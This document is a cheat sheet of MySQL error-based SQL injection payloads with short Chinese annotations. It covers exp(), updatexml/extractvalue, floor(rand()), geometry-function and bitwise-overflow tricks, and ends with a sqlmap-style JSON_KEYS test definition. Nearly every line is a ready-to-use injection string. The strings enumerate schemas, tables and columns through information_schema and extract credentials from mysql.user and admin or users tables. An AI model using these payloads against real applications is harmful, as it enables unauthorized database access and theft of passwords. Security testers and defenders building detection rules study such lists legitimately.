1.exp() MySQL>=5.5.5
select * from products where pid=1 and exp(~(select * from(select user())a));
1 and exp(~(select*from(select convert(concat(database(),0x7c,user(),0x7c,version())using latin1))a))--
1 and exp(~(select*from(select group_concat(table_name)from information_schema.tables where table_schema=database())a))--
1 and exp(~(select*from(select group_concat(column_name)from information_schema.columns where table_name='user')a))--
1 and exp(~(select*from(select concat(host,0x7c,user,0x7c,password)from user limit 0,1)a))--
1 and exp(~(select*from(select @a:=(select @b:=schema_name from{a information_schema.schemata} limit 0,1))a))#
1 and exp(~(select*from(select @a:=schema_name from{a information_schema.schemata} limit 0,1)a))#
1 and exp(~(select*from(select @a:=(select @b:=table_name from{a information_schema.tables} where table_schema='uat_db_web' limit 1,1))a))#
2.函数extractvalue(),updatexml() Mysql>=5.1.5
1' and `updatexml` (1,concat(0x7e,database()),1)or'
1' and `extractvalue` (1,concat(0x7e,database()),1)or'
3.函数floor()
and (select 1 from (select count(*),concat(0x7e7e,version(),0x7c,user(),0x7c,database(),0x7c,@@datadir,0x7e7e,floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select 1 from (select count(*),concat(0x7e7e,(select concat(username,0x3a,password,0x3a,encrypt,0x3a,roleid) from admin limit0,1),0x7e7e,floor(rand(0)*2))x from information_schema.tables group by x)a);
and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
select count(*) from admin group by concat(version(),floor(rand(0)*2));
select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
4.GemetryCollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()
select * from products where pid=1 and geometrycollection((select * from(select * from(select user())a)b));
select * from products where pid=1 and multipoint((select * from(select * from(select user())a)b));
select * from products where pid=1 and polygon((select * from(select * from(select user())a)b));
select * from products where pid=1 and multipolygon((select * from(select * from(select user())a)b));
select * from products where pid=1 and linestring((select * from(select * from(select user())a)b));
select * from products where pid=1 and multilinestring((select * from(select * from(select user())a)b));
select name from member where num=1 and polygon(已知列名)----爆出当前库/表名
select name from member where num=1 and linestring(已知列名)----爆出当前库/表名
5.~ MySQL>=5.5.5 && not suite for MariaDB
select ~0+!(select*from(select user())x);
select !(select*from(select user())x)-~0;
select (select(!x-~0)from(select(select user())x)a);
select (select!x-~0.from(select(select user())x)a);
' or !(select*from(select user())x)-~0 or '
select host from mysql.user where 1='' or !(select*from(select user())x)-~0 or '' ;
select !atan((select*from(select user())a))-~0;
' or !atan((select*from(select user())a))-~0 or '
select !log((select*from(select user())a))-~0;
' or !log((select*from(select user())a))-~0 or '
select !floor((select*from(select user())a))-~0;
' or !floor((select*from(select user())a))-~0 or '
select !(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0
select !(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0;
select !(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;
select !(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
select (select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
select (select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
6.other
select name from member where num=1 and (select*from(select*from member as a join member as b)as c)----爆出第1列列名num
select name from member where num=1 and (select*from(select*from member as a join member as b using(num))as c)----爆出第2列列名name
select name from member where num=1 and (select*from(select*from member as a join member as b using(num,name))as c)----爆出第3列列名birthday
select name from member where num=1-a()----爆出当前库名
select 9999999999*9999999999;
7.Json
<test>
<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS FUNCTION)</title>
<stype>2</stype>
<level>1</level>
<risk>0</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))USING UTF8)))</vector>
<request>
<payload>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))USING UTF8)))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>>= 5.7</dbms_version>
</details>
</test>